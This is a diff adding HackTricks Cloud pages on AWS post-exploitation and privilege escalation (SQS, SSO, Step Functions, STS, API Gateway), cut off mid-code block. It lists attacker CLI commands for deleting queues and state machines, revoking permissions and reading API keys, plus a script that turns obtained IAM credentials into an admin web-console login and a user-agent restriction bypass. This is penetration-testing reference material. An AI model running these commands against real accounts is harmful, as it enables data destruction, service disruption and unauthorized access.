+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SQS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
+[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
+{% endcontent-ref %}
+
+### `sqs:SendMessage` , `sqs:SendMessageBatch`
+
+An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+
+```bash
+aws sqs send-message --queue-url <value> --message-body <value>
+aws sqs send-message-batch --queue-url <value> --entries <value>
+```
+
+**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+
+### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
+
+An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
+
+```bash
+aws sqs receive-message --queue-url <value>
+aws sqs delete-message --queue-url <value> --receipt-handle <value>
+aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> --visibility-timeout <value>
+```
+
+**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+
+### `sqs:DeleteQueue`
+
+An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
+
+```arduino
+Copy codeaws sqs delete-queue --queue-url <value>
+```
+
+**Potential Impact**: Message loss and service disruption for applications using the deleted queue.
+
+### `sqs:PurgeQueue`
+
+An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
+
+```arduino
+Copy codeaws sqs purge-queue --queue-url <value>
+```
+
+**Potential Impact**: Message loss and service disruption for applications relying on the purged messages.
+
+### `sqs:SetQueueAttributes`
+
+An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability.
+
+```arduino
+aws sqs set-queue-attributes --queue-url <value> --attributes <value>
+```
+
+**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+
+### `sqs:TagQueue` , `sqs:UntagQueue`
+
+An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws sqs tag-queue --queue-url <value> --tags Key=<key>,Value=<value>
+aws sqs untag-queue --queue-url <value> --tag-keys <key>
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+### `sqs:RemovePermission`
+
+An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
+
+```arduino
+arduinoCopy codeaws sqs remove-permission --queue-url <value> --label <value>
+```
+
+**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
new file mode 100644
index 0000000000..ccffb5ede5
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
@@ -0,0 +1,53 @@
+# AWS - SSO & identitystore Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SSO & identitystore
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment`
+
+These permissions can be used to disrupt permissions:
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
+
+aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary-policy-arn <PolicyARN>
+
+aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
new file mode 100644
index 0000000000..67719fd731
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -0,0 +1,105 @@
+# AWS - Step Functions Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Step Functions
+
+For more information about this AWS service, check:
+
+{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
+[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
+{% endcontent-ref %}
+
+### `states:RevealSecrets`
+
+This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true.
+
+<figure><img src="../../../.gitbook/assets/image (348).png" alt=""><figcaption></figcaption></figure>
+
+### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
+
+An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+
+{% hint style="info" %}
+* Deleting a state machine you also delete all its associated versions and aliases.
+* Deleting a state machine alias you do not delete the state machine versions referecing this alias.
+* It is not possible to delete a state machine version currently referenced by one o more aliases.
+{% endhint %}
+
+```bash
+# Delete state machine
+aws stepfunctions delete-state-machine --state-machine-arn <value>
+# Delete state machine version
+aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
+# Delete state machine alias
+aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
+```
+
+* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+
+### `states:UpdateMapRun`
+
+An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
+
+{% code overflow="wrap" %}
+```bash
+aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
+```
+{% endcode %}
+
+* **Potential Impact**: Performance degradation, and disruption of critical workflows.
+
+### `states:StopExecution`
+
+An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+
+{% hint style="warning" %}
+This action is not supported by **express state machines**.
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
+```
+{% endcode %}
+
+* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+
+### `states:TagResource`, `states:UntagResource`
+
+An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
+aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
new file mode 100644
index 0000000000..7a03ece8eb
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -0,0 +1,136 @@
+# AWS - STS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## STS
+
+For more information:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+### From IAM Creds to Console
+
+If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
+Note that the the user/role must have the permission **`sts:GetFederationToken`**.
+
+#### Custom script
+
+The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
+
+{% code overflow="wrap" %}
+```bash
+# Get federated creds (you must indicate a policy or they won't have any perms)
+## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
+## Don't forget to use [--profile <prof_name>] in the first line if you need to
+output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
+
+if [ $? -ne 0 ]; then
+    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
+    exit $status
+fi
+
+# Parse the output
+session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
+session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
+session_token=$(echo $output | jq -r '.Credentials.SessionToken')
+
+# Construct the JSON credentials string
+json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
+
+# Define the AWS federation endpoint
+federation_endpoint="https://signin.aws.amazon.com/federation"
+
+# Make the HTTP request to get the sign-in token
+resp=$(curl -s "$federation_endpoint" \
+    --get \
+    --data-urlencode "Action=getSigninToken" \
+    --data-urlencode "SessionDuration=43200" \
+    --data-urlencode "Session=$json_creds"
+)
+signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
+
+
+
+# Give the URL to login
+echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
+```
+{% endcode %}
+
+#### aws\_consoler
+
+You can **generate a web console link** with [https://github.com/NetSPI/aws\_consoler](https://github.com/NetSPI/aws_consoler).
+
+```bash
+cd /tmp
+python3 -m venv env
+source ./env/bin/activate
+pip install aws-consoler
+aws_consoler [params...] #This will generate a link to login into the console
+```
+
+{% hint style="warning" %}
+Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
+{% endhint %}
+
+#### aws-vault
+
+[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
+
+```bash
+aws-vault list
+aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
+aws-vault login jonsmith # Open a browser logged as jonsmith
+```
+
+{% hint style="info" %}
+You can also use **aws-vault** to obtain an **browser console session**
+{% endhint %}
+
+### **Bypass User-Agent restrictions from Python**
+
+If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
+
+{% code overflow="wrap" %}
+```bash
+# Shared by ex16x41
+# Create a client
+session = boto3.Session(profile_name="lab6")
+client = session.client("secretsmanager", region_name="us-east-1")
+
+# Change user agent of the client
+client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )
+
+# Perform the action
+response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
new file mode 100644
index 0000000000..4ca191307f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
@@ -0,0 +1,39 @@
+# AWS - VPN Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## VPN
+
+For more information:
+
+{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
new file mode 100644
index 0000000000..5d96ec8ca1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -0,0 +1,51 @@
+# AWS - Privilege Escalation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Privilege Escalation
+
+The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization.
+
+{% hint style="warning" %}
+AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
+{% endhint %}
+
+{% hint style="danger" %}
+If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\
+So remember that this is another way to **grant privileged permissions** to a principal.
+{% endhint %}
+
+**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.**
+
+## Tools
+
+* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py)
+* [Pacu](https://github.com/RhinoSecurityLabs/pacu)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
new file mode 100644
index 0000000000..fb13f32767
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -0,0 +1,142 @@
+# AWS - Apigateway Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Apigateway
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-api-gateway-enum.md" %}
+[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md)
+{% endcontent-ref %}
+
+### `apigateway:POST`
+
+With this permission you can generate API keys of the APIs configured (per region).
+
+```bash
+aws --region <region> apigateway create-api-key
+```
+
+**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+
+### `apigateway:GET`
+
+With this permission you can get generated API keys of the APIs configured (per region).
+
+```bash
+aws --region <region> apigateway get-api-keys
+aws --region <region> apigateway get-api-key --api-key <key> --include-value
+```
+
+**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+
+### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`
+
+With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda).
+
+{% code overflow="wrap" %}
+```bash
+aws apigateway update-rest-api \
+    --rest-api-id api-id \
+    --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'
+```
+{% endcode %}
+
+**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info.
+
+### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**.
+
+{% code overflow="wrap" %}
+```bash
+API_ID="your-api-id"
+RESOURCE_ID="your-resource-id"
+HTTP_METHOD="GET"
+LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
+LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"
+
+# Add a new integration to the API Gateway REST API
